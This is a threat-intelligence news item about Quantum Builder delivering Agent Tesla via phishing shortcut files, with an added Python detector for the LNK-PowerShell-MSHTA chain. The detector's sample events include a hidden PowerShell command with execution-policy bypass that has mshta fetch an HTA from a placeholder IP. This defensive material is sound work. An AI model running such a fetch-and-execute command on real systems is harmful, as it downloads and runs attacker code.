Cyber Criminals Using Quantum Builder Sold on Dark Web to Deliver Agent Tesla Malware

September 28, 2022

A recently discovered malware builder known as Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT).

“This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past,” Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a Tuesday write-up.

Sold on the dark web for €189 a month, Quantum Builder is a customizable tool for generating malicious shortcut files as well as HTA, ISO, and PowerShell payloads that deliver next-stage malware to the targeted machine, in this case Agent Tesla.

The multi-stage attack chain begins with a spear-phishing email carrying a GZIP archive attachment. The archive contains a shortcut crafted to execute PowerShell code, which in turn launches a remote HTML application (HTA) via MSHTA.

The phishing emails purport to be an order confirmation from a Chinese supplier of lump and rock sugar, with the LNK file masquerading as a PDF document.

The HTA file then decrypts and executes a further PowerShell loader script, which acts as a downloader that fetches the Agent Tesla malware and executes it with administrative privileges.

In a second variant of the infection sequence, the GZIP archive is replaced by a ZIP file, and additional obfuscation techniques are adopted to camouflage the malicious activity.
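The chain described above (shortcut → PowerShell → MSHTA fetching a remote HTA → PowerShell loader running elevated) leaves a distinctive parent/child process trail that endpoint telemetry can catch regardless of how the LNK or HTA is obfuscated. The following is an added detection example, not code from the Zscaler write-up or from this article: it walks a set of constructed Sysmon-style process-creation events (the PIDs, command lines and the 198.51.100.7 documentation address are all made up for illustration) and flags each stage of the chain.

```python
"""Process-lineage detection for an LNK -> PowerShell -> MSHTA -> PowerShell loader chain.

Added example over constructed telemetry; event shapes loosely follow Sysmon
Event ID 1 fields but are simplified (assumption, not a real log format).
"""
import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str        # executable name, lower-case
    cmdline: str      # full command line as logged
    integrity: str    # "medium" (normal user) or "high" (elevated/admin)


# Constructed sample telemetry. PIDs 100-400 model a user double-clicking a
# malicious shortcut; 500 and 600 are benign noise that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe", "medium"),
    ProcEvent(200, 100, "powershell.exe",
              'powershell.exe -w hidden -ep bypass -c "mshta http://198.51.100.7/o.hta"', "medium"),
    ProcEvent(300, 200, "mshta.exe", "mshta.exe http://198.51.100.7/o.hta", "medium"),
    ProcEvent(400, 300, "powershell.exe", "powershell.exe -enc <base64 placeholder>", "high"),
    ProcEvent(500, 100, "winword.exe", "winword.exe report.docx", "medium"),
    ProcEvent(600, 1, "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1", "high"),
]


def build_index(events):
    """Map pid -> event so parents can be looked up in O(1)."""
    return {e.pid: e for e in events}


def lineage(pid, by_pid):
    """Return image names from the given process up to the root, child first.
    A 'seen' set guards against PID reuse creating a cycle in the log."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        chain.append(ev.image)
        pid = ev.ppid
    return chain


def detect_chain(events):
    """Return (rule_name, pid) findings for each stage of the delivery chain.

    Stage 0: hidden PowerShell spawned directly by explorer.exe (typical of a
             double-clicked LNK; low confidence on its own).
    Stage 1: mshta.exe loading a remote URL with PowerShell in its ancestry.
    Stage 2: powershell.exe descended from mshta.exe; 'critical' when it runs
             at high integrity, matching the elevated loader described above.
    """
    by_pid = build_index(events)
    findings = []
    for ev in events:
        ancestors = lineage(ev.pid, by_pid)[1:]   # drop the process itself
        if (ev.image == "powershell.exe" and ancestors[:1] == ["explorer.exe"]
                and re.search(r"-w(indowstyle)?\s+hidden", ev.cmdline, re.I)):
            findings.append(("hidden_powershell_from_explorer", ev.pid))
        if ev.image == "mshta.exe" and URL_RE.search(ev.cmdline) and "powershell.exe" in ancestors:
            findings.append(("remote_hta_from_powershell", ev.pid))
        if ev.image == "powershell.exe" and "mshta.exe" in ancestors:
            sev = "critical" if ev.integrity == "high" else "high"
            findings.append((f"powershell_child_of_mshta_{sev}", ev.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect_chain(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The stage-1 and stage-2 rules are the high-signal ones: legitimate software almost never has MSHTA pull an HTA over HTTP from underneath PowerShell, and a PowerShell process whose ancestor is mshta.exe is a strong indicator on its own. The stage-0 rule is included to show where the shortcut itself surfaces in telemetry; on its own it should feed a correlation search rather than an alert, since scheduled tasks and login scripts also produce hidden PowerShell windows.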

Quantum Builder has seen a surge in use in recent months, with threat actors using it to distribute a variety of malware, such as RedLine Stealer, IcedID, GuLoader, RemcosRAT, and AsyncRAT.

“Threat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime marketplace,” the researchers said.

“This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to deliver malicious payloads in campaigns against various organizations.”

Some parts of this article are sourced from:
thehackernews.com